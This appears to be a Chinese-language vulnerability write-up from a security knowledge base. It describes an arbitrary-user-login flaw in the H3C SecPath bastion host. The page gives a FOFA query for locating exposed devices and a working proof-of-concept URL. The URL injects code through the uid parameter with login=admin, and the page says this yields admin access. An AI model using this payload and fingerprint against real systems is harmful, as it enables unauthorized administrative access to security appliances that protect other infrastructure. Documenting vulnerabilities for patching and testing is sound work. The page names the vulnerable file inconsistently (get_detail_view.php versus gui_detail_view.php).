menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞 chevron_right H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞.md
    557 B / 2021-07-15 19:53:36
        # H3C SecParh堡垒机 get_detail_view.php 任意用户登录漏洞
    
    ## 漏洞描述
    
    H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞
    
    与齐治堡垒机出现的漏洞相似
    
    ## 漏洞影响
    
    > H3C SecParh堡垒机 
    
    ## FOFA
    
    > app="H3C-SecPath-运维审计系统" && body="2018"
    
    ## 漏洞复现
    
    POC验证的Url为
    
    ```
    /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
    ```
    
    ![h3c-1](/resource/H3C-SecParh堡垒机/h3c-1.png)
    
    成功获取admin权限
    
    links
    file_download